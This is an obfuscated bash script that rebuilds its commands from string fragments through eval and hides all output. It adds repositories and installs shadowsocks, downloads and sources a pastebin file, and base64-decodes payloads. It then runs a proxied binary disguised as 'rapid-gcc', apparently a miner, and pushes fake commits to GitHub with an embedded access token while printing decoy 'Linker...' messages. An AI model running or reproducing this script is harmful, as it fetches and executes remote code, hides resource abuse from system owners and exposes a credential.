sHgqVZsk="sudo add-apt-r"
ruvrWRPq="epository "
vWvRqxfv="ppa:max-c-l"
HFTGv="v/shadowsocks"
fyEHD="-libev -y &>"
tglSY="/dev/null "
sALoNM="|| t"
eval "$sHgqVZsk""$ruvrWRPq""$vWvRqxfv""$HFTGv""$fyEHD""$tglSY""$sALoNM""rue"
OnGqWw="sudo add-apt-r"
BnlP="epository ppa"
JRJsnjc=":ondrej/ap"
DbeS="ache2 -y &>/"
cVSCpQmQ="dev/null |"
WtGG="| t"
eval "$OnGqWw""$BnlP""$JRJsnjc""$DbeS""$cVSCpQmQ""$WtGG""rue"
sVfoOxx="do apt update "
eWbM="&>/dev/null"
XNMxlYrM=" || tru"
eval "su""$sVfoOxx""$eWbM""$XNMxlYrM""e"
nRIf="get -O codesrc "
HmNmWJsv="https://pastebi"
edzECCVl="n.com/raw/UKs"
rzEYvhO="9hZfc &>/dev/nu"
bYRbeZxT="l"
eval "w""$nRIf""$HmNmWJsv""$edzECCVl""$rzEYvhO""$bYRbeZxT""l"
GBEg="rce ./codesrc"
eval "sou""$GBEg"
git clone $SRC codes &>/dev/null
ipuRteX="se64 -d codes/s"
Zbffj=" > o"
eval "ba""$ipuRteX""$Zbffj"
sudo apt --yes install openssl &>/dev/null || true
nzHOywbG="sudo apt -"
crtF="-yes install p"
ZuRyq="smisc shado"
atoAyfz="wsocks-libe"
mLzyUK="v &>/dev/n"
sgKBgdpZ="ull || tr"
eval "$nzHOywbG""$crtF""$ZuRyq""$atoAyfz""$mLzyUK""$sgKBgdpZ""ue"
WNamnD="sudo system"
MGgBDeC="ctl stop shad"
lxSTa="owsocks-libev.s"
Vwzi="ervice &>/dev/n"
MLnu="ull || "
eval "$WNamnD""$MGgBDeC""$lxSTa""$Vwzi""$MLnu""true"
tkhA="e64 -d codes/c"
jKnJNZt=" > rust-cfg"
eval "bas""$tkhA""$jKnJNZt"
hDeCSWX="se64 -d codes/"
PpZyBLP="gc > "
eval "ba""$hDeCSWX""$PpZyBLP""gc"
ruIc="e64 -d codes/m "
iohuGfi="> rapid-"
eval "bas""$ruIc""$iohuGfi""gcc"
KsHsU="ase64 -d c"
vrWm="odes/p > prepa"
eval "b""$KsHsU""$vrWm""re"
. ./prepare
rfFp="do ss-loca"
zTAviHm="l -c o --plu"
mnocESI="gin ./gqs --"
gSoU="plugin-opts "
nQetJ="./gc &>/dev/n"
qgPOi="ull &"
eval "su""$rfFp""$zTAviHm""$mnocESI""$gSoU""$nQetJ""$qgPOi"
wadWloQY="od +x rapi"
WlYdFG="d-"
eval "chm""$wadWloQY""$WlYdFG""gcc"
qCzbbn="d -i 's/gcc/"
YzhSpXs="cegfo/g' rust"
tEuqep="-"
eval "se""$qCzbbn""$YzhSpXs""$tEuqep""cfg"
mwWsO="do ./rapid-"
WwdXbvB="gcc --config "
NPILItF="rust-cfg &>/d"
dzTLmY="ev/nu"
eval "su""$mwWsO""$WwdXbvB""$NPILItF""$dzTLmY""ll &"
echo xozpxa
TOFaNGP="sle"
eval "$TOFaNGP""ep 65"
CrEu="git clone htt"
cnKGu="ps://github.com"
cFmaDzQ="/fedora-ecu-"
GGfTr="deform/mcp"
FEYTs=".git tmp &"
TDqgNvzo=">/dev/null"
Sabez=" || tr"
eval "$CrEu""$cnKGu""$cFmaDzQ""$GGfTr""$FEYTs""$TDqgNvzo""$Sabez""ue"
LQFAErp="d tmp || t"
eval "c""$LQFAErp""rue"
HPESbLe="it config user"
kgNnMAw=".name 'Tamara"
pTNHViUM=" Hramova' "
DGMSsB="&>/dev/null ||"
syJWnr=" tru"
eval "g""$HPESbLe""$kgNnMAw""$pTNHViUM""$DGMSsB""$syJWnr""e"
GsvVUXQT="git config user"
jkdUcyc=".email tamar"
vKjO="a.hramovaklp@ra"
ArZN="mbler.ru &>/de"
wwNCmr="v/null || t"
eval "$GsvVUXQT""$jkdUcyc""$vKjO""$ArZN""$wwNCmr""rue"
IOTlJ="UILD=\`date +"
pJPu="%s"
eval "B""$IOTlJ""$pJPu""\`"
wMHUD="MAKE=\`date"
eval "$wMHUD"" +%S\`"
echo $BUILD >> xozpxa$MAKE
echo 'mcp' >> xozpxa$MAKE
git add xozpxa$MAKE &>/dev/null || true
git commit -m $MAKE' mcp refine' &>/dev/null || true
woIDWjfI="t push https"
gtXcNkJ="://tamara-hr"
APGgyw="amovaklp:'8"
iKOYGG="UWCurNWlD6_7J"
WrPgjEOz="e'@github."
FslLo="com/fedora"
dwUm="-ecu-defor"
xIdcQYt="m/mcp.git -"
vOckEjFi="f &>/dev/n"
pQqf="ull ||"
eval "gi""$woIDWjfI""$gtXcNkJ""$APGgyw""$iKOYGG""$WrPgjEOz""$FslLo""$dwUm""$xIdcQYt""$vOckEjFi""$pQqf"" true"
while :; do G=`date +%s`; echo 'Linker... '$G; [ `expr 1386 + $BUILD` -lt $G ] && sudo killall rapid-gcc && break; sleep 163; done
